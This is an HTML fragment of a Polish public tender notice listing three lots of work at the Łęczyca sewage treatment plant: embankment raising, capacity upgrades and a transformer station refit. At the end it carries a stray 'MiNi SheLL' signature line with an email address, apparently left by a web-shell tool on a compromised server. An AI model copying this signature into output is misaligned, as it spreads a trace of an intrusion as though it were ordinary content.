<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Podwyższenie wałów przeciwpowodziowych na terenie oczyszczalni ścieków w Łęczycy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podwyższenie studni drenażu okrężnego i studzienek drenarskich. Prace na wale: roboty ziemne do rz.60,00m npm, wbicie ścianek  z wyprasek stalowych  na odcinkach wjazdu na wał i wzdłuż drogi  dojazdowej do oczyszczalni, układanie folii, nachylenie skarpy odwodnej 1:2,50; w górnej warstwie  na koronie wału geokrata wypełniona piaskiem na rz.60,50m npm; łączna długość wału 704m w tym 168m ścianki z wyprasek,  wykonanie tzw. ławki o dł. 250m wzdłuż linii PKP bez nawierzchni z geokraty; wykonanie i montaż znaków wodnych i urządzeń pomiarowych ( 2 kpl)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zwiększenie przepustowości oczyszczalni ścieków w Łęczycy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zwiększenie przepustowości  oczyszczania ścieków do 3.827m3 na dobę osiągnięte będzie poprzez modernizację poszczególnych obiektów oczyszczalni ścieków w Łęczycy w zakresie konstrukcji, technologii  i automatyki. Zakres prac obejmuje:
- pompownia główna-wzmocnienie istniejącej ściany poprzez wykonanie ściany wewnętrznej w postaci walca o grubości 0,3 m do poziomu pomostu roboczego, wymiana konstrukcji pomostu roboczego stalowego na ze stali nierdzewnej; demontaż istniejących urządzeń  i armatury- pomp, mieszadła, przepływomierza oraz rurociągów i montaż nowych; montaż przepływomierza ścieków oczyszczonych w komorze za osadnikiem wtórnym, montaż urządzenia wyciągowego na zewnątrz pompowni w wersji ko; w zakresie AKPiA -wykonanie nowej szafy sterowniczej, z której zasilane będą wszystkie urządzenia pompowni. Doprowadzenie nowego kabla zasilającego do każdego z napędów sterowanych z rozdzielni R1. 

-  budynek mechanicznej oczyszczalni ścieków- prace związane z konserwacją i podniesieniem o 0,5m sitopiaskownika ROTAMAT typ Ro5 produkcji HUBER Technology; konstrukcja wykonana będzie ze stali nierdzewnej oraz usunięcie kolizji z belką serwisową - przesunięcie o 50 cm; dostosowanie istniejących rurociągów doprowadzających oraz oprowadzających ścieki do podniesionego urządzenia; modernizacja przewiduje wymianę kompresora o mocy 1,5kW oraz wymianę zestawu hydroforowego doprowadzającego  wodę technologiczną do sito-  piaskownika

- reaktor biologiczny- wymiana mieszadeł zanurzalnych i pompujących z niezbędnym układem urządzeń wyciągowych; wymiana instalacji napowietrzania z zastosowaniem układu z płyt napowietrzający typu HAFI oraz rurociągów doprowadzających powietrze na odcinku rurociąg zbiorczy - płyta napowietrzająca; wymiana układu sond pomiarowych wskazujących wymagane parametry dla prawidłowej pracy urządzenia;

-osadnik wtórny- przegląd i konserwacja  następujących elementów urządzeń: wózek jezdny, układ zgrzebeł dennych, układ zgarniania i części pływających, łożysko centralne, zespół szczotki, układ elektryczny;

-wymiana dmuchaw z modernizacją układu napowietrzania-  zakup i montaż nowej dmuchawy typu GM 35S firmy Aerzen ( dmuchawa podstawowa), demontaż jednej dmuchawy typu GM 15L firmy Aerzen (dmuchawa awaryjna, rezerwowa), modernizacja układu napowietrzania umożliwiająca zasilanie instalacji napowietrzania każdego ciągu technologicznego reaktora niezależnie od siebie;

- obejście rurociągu tłocznego ścieków surowych- na odcinku pomiędzy komorą wylotową (włączenie przed komorą) a pompownią główną ( włączenie za pompownią), odcinek sieci kanalizacyjnej o długości 69,5 m  DN300 z rur PE100 PN10 zgrzewanych doczołowo, montaż zasuw nożowych w  betonowych  studniach kanalizacyjnych O 1000 mm  (1 szt.)  i  O 1200 mm 
(1 szt.) oraz w miejscach włączenia do istniejącego układu, powykonawcza inwentaryzacja geodezyjna, odtworzenie nawierzchni;

-wymiana stanowiska wizualizacji- zakup stanowiska komputerowego o minimalnej konfiguracji: procesor klasy Intel Core 2 Duo, pamięć RAM 2GB, twardy dysk 2x500GB -RAID, karta graficzna o rozdzielczości Full HD; system operacyjny Windows XP Professional; monitor LCD 22; klawiatura; mysz; głośniki; zasilacz UPS umożliwiający pracę zestawu przy zaniku zasilania przez min. 5 min.; aktualizacja oprogramowania i wizualizacji pracy oczyszczalni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Modernizacja stacji transformatorowej na terenie oczyszczalni ścieków w Łęczycy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowie podlega przystosowanie dwóch rozdzielnic SN 15KV w stacji transformatorowej  K-546 do zabudowy pośrednich układów pomiarowych w związku ze wzrostem mocy na zasilaniu podstawowym i rezerwowym z 100kW na 220KW;   wykonanie konstrukcji wsporczej pod  zabudowanie na zewnątrz stacji agregatu prądotwórczego; konieczność wymiany istniejącego dwupolowego układu SZR (samoczynne załączanie rezerwy) na układ trzypolowy w układzie  transformator I,  transformator II i agregat prądotwórczy 400kVA 0,4 kV.kod CPV.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com